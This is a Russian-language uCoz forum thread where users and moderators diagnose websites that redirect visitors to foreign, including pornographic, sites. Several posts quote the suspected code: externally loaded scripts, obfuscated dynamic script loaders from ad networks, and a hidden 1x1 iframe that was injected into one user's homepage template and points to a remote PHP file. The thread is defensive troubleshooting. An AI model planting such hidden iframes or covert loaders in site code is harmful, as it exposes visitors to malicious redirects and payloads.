Чат сообщества
   | |
| Модератор форума: Yuri_G |
| Сообщество uCoz » Мастерская uCoz » Безопасность сайта » При заходе на сайт перекидывает на другой |
| При заходе на сайт перекидывает на другой |
 Описание проблемы: При попытке зайти на свой сайт вас прекидывает на совершенно чужой сайт. Это может происходить сразу, через какой-то промежуток времени или вместо вашей страницы вы видите чужую с чужим адресом  Причины возникновения: 1) Сторонние скрипты вставленные на сайт с подгрузкой с чужих адресов. И iframe вставки Если вы ставите к себе на сайт скрипт подобного вида Code <script type="text/javascript" src="http://levyisite.ru/nazvanie.js"></script> где levyisite.ru адрес не вашего сайта, а чужого, то вы всегда должны быть готовы к тому, что содержимое подгружаемого скрипта может изменится. Если скрипт работает в нормальном режиме сначала, то при изменении или удалении содержимого на сервере где он храниться, скрипт или перестанет работать или будет иметь уже другие функции, иногда вредоносные Если вы решили установить к себе на сайт скрипт, но ничего в скриптах не понимаете, перед установкой вы можете обратиться в эту тему //forum.ucoz.ru/forum/45-35735-1 и проверить его на безопасность 2) Сторонние скрипты вшитые в элементы дизайна или шаблонов найденные в открытом доступе Если вы все время находитесь в состоянии поиска новых украшений для своего сайта, таких как готовых блоков, информеров, измененных дизайнов мини-чатов, опросов, форм входа, вида материалов, блоков статистики на форум или сайт и так далее, то при копировании готового кода на сайтах, где это все раздают, проверяйте код на наличие сторонних скриптов (тип скрипта описан в пункте1) и iframe вставок. Если вы видите в коде конструкцию наподобии этой Code <iframe src="http://levyisite.ru" width="1" height="1"></iframe> Где levyisite.ru - это адрес чужого сайта а Code width="1" height="1" Code width="0" height="0" Если вы вообще не разбираетесь в HTML и не понимаете что копируете, то перед установкой очередного украшения на сайт вы можете проверить полученный код для вставки в этой теме //forum.ucoz.ru/forum/45-35735-1 на наличие вредоносных объектов 3) Рипы шаблонов и готовые шаблоны найденные в открытом доступе. В готовых шаблонах могут быть вшиты скрипты и iframe вставки, а так же рекламные блоки и спам скрытый посредством кода от вывода на экран. Вшитые скрипты и вставки могут быть с пустым содержимым и при запуске шаблона они могут не проявлять никаких признаков. Но подгруженные с чужих сайтов, содержимое может быть изменено, после чего может начаться вредоносная активность 4) Перехват домена. На сайтах с прикрепленным доменом, особенно у тех кто не имеет доступа к управлению доменом, сторонними лицами могут быть изменены настройки домена. Эффект может заключаться в том, что при переходе на свой сайт вы можете увидеть там совсем другой или будет происходить редирект на другой адрес  Если вы вообще ничего не поняли, но проблема переброски на чужие сайты с вашего у вас существует, то при обращении в эту тему вы должны дать ссылку на свой сайт, дать ссылку на сайт куда перебрасывает, а так же указать происходит это под логином или под гостем |
|
Валерий_СЕВЕРИН, да. на ваш. на котором проблемы переброса
|
|
webanet, www.vals.ucoz.ua
|
|
Валерий_СЕВЕРИН, из блока сейчас удалить скрипт
Код <script language="JavaScript" src="http://101widgets.com/14040001/130/93"></script> из блока календарь удалить скрипт Код <script language="JavaScript" src="http://101widgets.com/00004012/170/187"></script> дальше сделайте большой и четкий скрин блокировок касперского по вашему сайту |
|
webanet, Спасибо, все исправил, меня изначально и насторожил этот код, ну с чем не шутит. Дай Бог чтоб все исправилось, всегда вроде был насчет кодов внимателен, наверно потерял стаж. А на счет Касперского я так и не понял с какой периодичностью он блокирует др. сайт. Просто временами то кинет то нет. Ну я думаю через недельку я Вам, если можно, отпишусь в ЛС. Спасибо за помощь!
 |
|
Помогите пожалуйста.
Я не новичек, никакого мусора, шаблонов, чужих скриптов, ничего не вставляю. Сегодня вставил только один баннер и через час сайт под группой гости стал перекидывать на порно ресурс. Баннер сразу снял, но мой сайт все равно перекидывает на эту порнуху. Проверил весь код, ничего не вижу. Посмотрите пожалуйста. Сайт сеичас закрыл, чтобы не видели пользователи. Если нужно открыть напишите я тут сразу открою и закрою Доступно только для пользователей Сообщение отредактировал CKORO - Вторник, 17 Дек 2013, 20:15:43
|
|
Цитата CKORO (  )Если нужно открыть напишите я тут сразу открою и закрою |
|
Цитата CKORO ( )отключил Добавлено (17 Дек 2013, 19:45:02) |
|
Спасибо что посмотрели
только сеичас перебрасывало, сам не понимаю что происходит. только вот про это вы зря написали Цитата Ucoz_fanвижу вы занимаетесь накруткой счетчиков посещаемости, смотрите вам это еще боком вылезет... У меня крупный проект, с большой аудиторией 5 лет почти, все пользователи с поиска. О какой накрутке вы вообще говорите?? И зачем она мне? Даже обидно както |
|
CKORO, если то перебрасывает то нет, значит в одном из блоков рекламы что-то грязненькое крутится
или тут Код <script type="text/javascript" src="http://dynamic.exaccess.ru/asp/dynamic_script.asp?id_d=890036"></script> или тут Код <script> setTimeout(function() { var _s=document.createElement('SC'+'RI'+'PT'); _s.charset='UTF-8';_s.type='text/javascript'; _s.src='http://t1.teaser-goods.ru/ldr.js'; document.getElementsByTagName('body')[0].appendChild(_s); },0); </script> или тут Код <script type="text/javascript"> setTimeout(function() { var _s=document.createElement('SC'+'RI'+'PT'); _s.charset='UTF-8';_s.type='text/javascript'; _s.src='http://t2.lenta-novostei.com/ldrn.js'; document.getElementsByTagName('body')[0].appendChild(_s); },0); </script> Код <script>//<!-- _rnd=Math.round((Math.random() * 200000)); _url = 'http://ukrbanner.net/b.p?s=990&r='+_rnd; _size = ' width=468 height=60'; document.write('<iframe src="'+_url+'" '+_size+' frameborder="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>'); //--> </script> на каких страницах перебрасывало? |
|
webanet,
Начало перебрасывать гдето час назад с любой страницы, закрыл сайт, начал снимать проверять, и кеш чистил все равно перебрасывало, потом опять закрыл, написал сюда, открыл и уже не перекидывает. Был еще вот такой код <script src='http://mediaground.org/gate?u=16'></script> там баннеры 468x60 , посмотрел весь код ничего подобного про порноссылки там не вижу, рекламируют одежду, банки. |
|
При заходе на сайт сегодня начало перебрасывать на другой. В коде нашел вот ЭТО
<iframe src="http://edengi.uz/wp-content/upgrade/back.php" width="1" height="1" frameborder="0"></iframe> Стояла только в шаблоне главной сраницы. Что это такое и как попало в код, если лог безопасности ничего не показывает? |
|
|
|
Howlett, вот если бы зашли в панель, то были бы логи. а так могли зайти со стороны сайта как администратор. а вот при таком редактировании со стороны сайта логи не ведутся. поэтому всегда в таких случаях обязательно в первую очередь меняем пароль uID профиля администратора и убиваем всех других администраторов сайта и прочие группы с правами доступа к правке кода сайта
|
| |||